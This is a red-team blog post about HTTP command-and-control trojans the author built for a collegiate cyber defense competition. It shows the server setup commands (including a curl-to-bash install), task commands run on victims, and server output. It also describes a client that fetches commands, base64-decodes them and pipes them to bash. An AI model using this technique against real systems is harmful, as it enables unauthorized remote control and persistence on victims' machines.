This is our second post in a series covering various concepts and methods used for command and control (c2) trojans

In my previous blog post, I described the Northeast Cyber Collegiate Defense Competition (NECCDC) and started to explain some of the techniques the red team used.

For this post, I’m going to cover two more C2 Trojans that I wrote using HTTP (GET and POST). Similar to the C2 DNS Trojan, the HTTP Trojans are unidirectional and do not require installing software on the victim. By using multiple techniques at varying frequency we increased the likelihood we would be able to maintain persistence throughout the competition.



Quick HTTP (GET/POST) Command and Control Trojan Setup

Similar to the DNS C2 Trojan, we need to make sure our server has Ruby installed and set up. Do this using the following commands on a Linux system:

\curl -#L https://get.rvm.io | bash -s stable—autolibs=3—ruby
source "/home/$USER/.rvm/scripts/rvm"


Next, we need to install the thin and Sinatra gems. To do this, use the following command:

gem install thin
gem install sinatra


We are now ready to build a list of tasks we would like our victims to execute. For HTTP, we don’t need to break up the lines since we are not using DNS hostnames anymore. Therefore, we can just use the full command in a single line. The way to do this is by putting the commands you would like to run in the cmds.sh file:

id > /tmp/test.txt
w >> /tmp/test.txt
ls >> /tmp/test.txt


(put these commands in cmds.sh)

This will run the commands on the victim client.

 


Start the Server

Now we are ready to start the server using the following command:

bash ./run_server.sh


This will start up the server on port 8080. We used port 8080 instead of 80 or 443 because we wanted to make it easier to start up the server even without root permissions. Starting the server returned the following output:

[+] Server Started on port 8080
[+] Clients will execute the following commands:
id > /tmp/test.txt
w >> /tmp/test.txt
ls >> /tmp/test.txt

>> Thin web server (v1.5.1 codename Straight Razor)
>> Maximum connections set to 1024
>> Listening on 0.0.0.0:8080, CTRL+C to stop

 


Run the HTTP POST Client

Lastly, we are ready to run the HTTP POST client on the compromised system. You can do this by running the following command:

$ ./http_post_client.sh
Running HTTP/HTTPS C2 Trojan (w/ CURL)
$


The response to the request is base64 decoded and piped to bash for execution. Simple right? Let me know if you have any questions or comments about the Quick C2 HTTP Trojan.

Regards,

Jabra





Your World, Secured.


Tech Puzzles

Try our Puzzles

Test your problem solving skills. Do you have what it takes?

Try puzzles »